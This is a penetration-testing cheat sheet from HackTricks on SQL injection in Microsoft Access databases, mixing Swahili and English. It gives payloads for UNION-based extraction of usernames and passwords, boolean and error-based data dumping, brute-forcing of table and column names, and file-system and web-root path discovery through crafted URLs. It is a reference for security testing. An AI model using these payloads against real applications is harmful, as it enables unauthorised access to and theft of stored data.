MS Access SQL Injection

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Online Playground

https://www.w3schools.com/sql/trysql.asp?filename=trysql_func_ms_format&ss=-1

DB Limitations

String Concatenation

Mchanganyiko wa nyuzi unaweza kufanyika kwa kutumia wahusika & (%26) na + (%2b).

1' UNION SELECT 'web' %2b 'app' FROM table%00
1' UNION SELECT 'web' %26 'app' FROM table%00

Maoni

Hakuna maoni katika MS access, lakini inaonekana inawezekana kuondoa ya mwisho ya swali kwa kutumia herufi ya NULL:

1' union select 1,2 from table%00

Ikiwa hii haifanyi kazi, unaweza kila wakati kurekebisha sintaksia ya ombi:

1' UNION SELECT 1,2 FROM table WHERE ''='

Stacked Queries

Hazirishi.

LIMIT

Mwandiko wa LIMIT haujawekwa. Hata hivyo, inawezekana kupunguza matokeo ya swali la SELECT kwa safu za kwanza N za jedwali kwa kutumia mwandiko wa TOP. TOP inakubali kama hoja nambari, ikiwakilisha idadi ya safu zitakazorejeshwa.

1' UNION SELECT TOP 3 attr FROM table%00

Just like TOP you can use LAST which will get the rows from the end.

UNION Queries/Sub queries

In a SQLi you usually will want to somehow execute a new query to extract information from other tables. MS Access always requires that in subqueries or extra queries a FROM is indicated. So, if you want to execute a UNION SELECT or UNION ALL SELECT or a SELECT between parenthesis in a condition, you always need to indicate a FROM with a valid table name. Therefore, you need to know a valid table name.

-1' UNION SELECT username,password from users%00

Chaining equals + Substring

Hii itakuruhusu kutoa thamani za jedwali la sasa bila kuhitaji kujua jina la jedwali.

MS Access inaruhusu sintaksia za ajabu kama '1'=2='3'='asd'=false. Kama kawaida, SQL injection itakuwa ndani ya WHERE clause tunaweza kuitumia hiyo.

Fikiria una SQLi katika hifadhidata ya MS Access na unajua (au umekisia) kwamba jina moja la safu ni username, na hiyo ndiyo sehemu unayotaka kutoa. Unaweza kuangalia majibu tofauti ya programu ya wavuti wakati mbinu ya chaining equals inatumika na kwa uwezekano kutoa maudhui kwa kutumia boolean injection kwa kutumia Mid function kupata substrings.

'=(Mid(username,1,3)='adm')='

Ikiwa unajua jina la jedwali na safu ya kutupa unaweza kutumia mchanganyiko kati ya Mid, LAST na TOP ili kuvuja taarifa zote kupitia boolean SQLi:

'=(Mid((select last(useranme) from (select top 1 username from usernames)),1,3)='Alf')='

Feel free to check this in the online playground.

Brute-forcing Majina ya Meza

Using the chaining equals technique you can also bruteforce table names with something like:

'=(select+top+1+'lala'+from+<table_name>)='

Unaweza pia kutumia njia ya jadi zaidi:

-1' AND (SELECT TOP 1 <table_name>)%00

Feel free to check this in the online playground.

Sqlmap majina ya meza ya kawaida: https://github.com/sqlmapproject/sqlmap/blob/master/data/txt/common-tables.txt
Kuna orodha nyingine katika http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html

Brute-Forcing Majina ya Safu

Unaweza kujaribu majina ya safu za sasa kwa kutumia hila ya kuunganisha sawa na:

'=column_name='

Au kwa group by:

-1' GROUP BY column_name%00

Au unaweza kulazimisha majina ya safu za meza tofauti kwa:

'=(SELECT TOP 1 column_name FROM valid_table_name)='

-1' AND (SELECT TOP 1 column_name FROM valid_table_name)%00

Dumping data

Tumesha jadili mbinu ya kuunganisha sawa kutoa data kutoka kwa jedwali la sasa na mengine. Lakini kuna njia nyingine:

IIF((select mid(last(username),1,1) from (select top 10 username from users))='a',0,'ko')

Kwa kifupi, ombi linatumia taarifa ya "ikiwa-kisha" ili kuanzisha "200 OK" katika kesi ya mafanikio au "500 Internal Error" vinginevyo. Kwa kutumia opereta ya TOP 10, inawezekana kuchagua matokeo kumi ya kwanza. Matumizi yanayofuata ya LAST yanaruhusu kuzingatia tuple ya 10 tu. Kwenye thamani hiyo, kwa kutumia opereta ya MID, inawezekana kufanya kulinganisha kwa wahusika rahisi. Kwa kubadilisha ipasavyo index ya MID na TOP, tunaweza kutoa maudhui ya uwanja wa "username" kwa safu zote.

Muda Kulingana

Angalia https://docs.microsoft.com/en-us/previous-versions/tn-archive/cc512676(v=technet.10)?redirectedfrom=MSDN

Kazi Nyingine za Kuvutia

Mid('admin',1,1) pata sehemu ya wahusika kutoka nafasi 1 urefu 1 (nafasi ya awali ni 1)
LEN('1234') pata urefu wa mfuatano
ASC('A') pata thamani ya ascii ya wahusika
CHR(65) pata mfuatano kutoka thamani ya ascii
IIF(1=1,'a','b') ikiwa kisha
COUNT(*) Hesabu idadi ya vitu

Kuorodhesha meza

Kutoka hapa unaweza kuona ombi la kupata majina ya meza:

select MSysObjects.name
from MSysObjects
where
MSysObjects.type In (1,4,6)
and MSysObjects.name not like '~*'
and MSysObjects.name not like 'MSys*'
order by MSysObjects.name

However, note that is very typical to find SQL Injections where you don't have access to read the table MSysObjects.

FileSystem access

Web Root Directory Full Path

The knowledge of the web root absolute path may facilitate further attacks. If application errors are not completely concealed, the directory path can be uncovered trying to select data from an inexistent database.

http://localhost/script.asp?id=1'+'+UNION+SELECT+1+FROM+FakeDB.FakeTable%00

MS Access responds with an error message containing the web directory full pathname.

File Enumeration

The following attack vector can be used to inferrer the existence of a file on the remote filesystem. If the specified file exists, MS Access triggers an error message informing that the database format is invalid:

http://localhost/script.asp?id=1'+UNION+SELECT+name+FROM+msysobjects+IN+'\boot.ini'%00

Another way to enumerate files consists into specifying a database.table item. If the specified file exists, MS Access displays a database format error message.

http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+C:\boot.ini.TableName%00

.mdb File Name Guessing

Database file name (.mdb) can be inferred with the following query:

http://localhost/script.asp?id=1'+UNION+SELECT+1+FROM+name[i].realTable%00

Where name[i] is a .mdb filename and realTable is an existent table within the database. Although MS Access will always trigger an error message, it is possible to distinguish between an invalid filename and a valid .mdb filename.

.mdb Password Cracker

Access PassView ni zana ya bure ambayo inaweza kutumika kurejesha nenosiri kuu la database la Microsoft Access 95/97/2000/XP au Jet Database Engine 3.0/4.0.

References

http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousSQL Injection NextMSSQL Injection

Last updated 6 days ago